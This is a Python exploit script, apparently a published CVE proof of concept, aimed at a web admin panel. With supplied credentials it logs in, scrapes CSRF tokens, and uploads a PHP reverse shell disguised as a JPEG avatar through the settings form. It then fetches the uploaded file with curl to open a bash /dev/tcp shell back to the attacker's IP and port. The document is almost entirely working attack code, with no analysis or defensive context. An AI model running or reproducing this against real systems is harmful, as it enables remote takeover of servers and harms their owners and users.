README.md
Rendering markdown...
import argparse
import requests
from bs4 import BeautifulSoup
import subprocess
BANNER = """
\033[1;31m _____ _____ ___ __ ___ ____ ___ _ _ ___ _ _ ___
/ __\ \ / / __|_|_ ) \_ )__ /__|_ ) | |_ ) | |/ _ \\
| (__ \ V /| _|___/ / () / / |_ \___/ /|_ _/ /|_ _\_, /
\___| \_/ |___| /___\__/___|___/ /___| |_/___| |_| /_/ EXPLOIT by IDUZZEL\033[0m
"""
def get_tokens(session, url, endpoint):
try:
response = session.get(f"{url}/{endpoint}")
response.raise_for_status()
except requests.RequestException as e:
print(f"[-] Failed to fetch {endpoint} page: {e}")
return None, None
soup = BeautifulSoup(response.text, 'html.parser')
token_input = soup.find('input', {'name': '_token'})
if not token_input:
print(f"[-] No _token input found on {endpoint} page")
return None, None
token = token_input['value']
cookies = session.cookies.get_dict()
return token, cookies
def upload_revshell(url, username, password, ip, port):
session = requests.Session()
token, cookies = get_tokens(session, url, 'admin/auth/login')
if not token:
print("[-] Unable to retrieve token for login")
return
login_data = {
'username': username,
'password': password,
'_token': token
}
try:
login_response = session.post(f"{url}/admin/auth/login", data=login_data, cookies=cookies)
login_response.raise_for_status()
except requests.RequestException as e:
print(f"[-] Login failed: {e}")
return
if "Login failed" in login_response.text:
print("[-] Login failed, check your credentials")
return
token, cookies = get_tokens(session, url, 'admin/auth/setting')
if not token:
print("[-] Unable to retrieve token for settings")
return
# PHP reverse shell script
revshell_content = f"<?php system('bash -c \"bash -i >& /dev/tcp/{ip}/{port} 0>&1\"'); ?>"
with open('revshell.php', 'w') as revshell_file:
revshell_file.write(revshell_content)
files = {
'name': (None, 'Administrator'),
'avatar': ('revshell.php', open('revshell.php', 'rb'), 'image/jpeg'),
'_token': (None, token),
'_method': (None, 'PUT')
}
try:
response = session.post(f"{url}/admin/auth/setting", files=files, cookies=cookies)
response.raise_for_status()
print("[+] Reverse shell uploaded successfully! Attempting to execute it...")
# Send GET request to execute the reverse shell in a non-blocking manner
shell_url = f"{url}/uploads/images/revshell.php"
subprocess.Popen(['curl', shell_url])
print(f"[+] Reverse shell executed successfully! Check your listener at {ip}:{port}")
except requests.RequestException as e:
print(f"[-] Failed to upload reverse shell: {e}")
def main():
parser = argparse.ArgumentParser(description="Exploit script for command injection vulnerability")
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-U', '--username', required=True, help='Username')
parser.add_argument('-P', '--password', required=True, help='Password')
parser.add_argument('-i', '--ip', required=True, help='IP for reverse shell')
parser.add_argument('-p', '--port', required=True, help='Port for reverse shell')
args = parser.parse_args()
print(BANNER)
upload_revshell(args.url, args.username, args.password, args.ip, args.port)
if __name__ == "__main__":
main()